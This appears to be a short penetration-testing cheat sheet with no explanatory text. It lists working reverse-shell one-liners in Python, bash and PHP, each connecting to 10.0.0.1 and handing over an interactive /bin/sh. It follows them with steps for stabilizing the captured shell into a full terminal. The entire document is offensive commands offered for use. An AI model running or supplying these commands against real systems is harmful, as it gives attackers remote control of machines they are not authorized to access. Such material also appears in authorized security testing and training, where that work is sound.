###shells###
1. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'  
2. bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
3. "php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 

###shell-stabalization###
1. python3 -c ‘ import pty; pty.spawn("/bin/bash") ’
  if doesn’t work, use delimiter: 
  python3 -c "import pty; pty.spawn(\"/bin/bash\")"   
2. ctrl+z 
3. stty raw -echo; fg
4. export TERM=xterm (pretty)
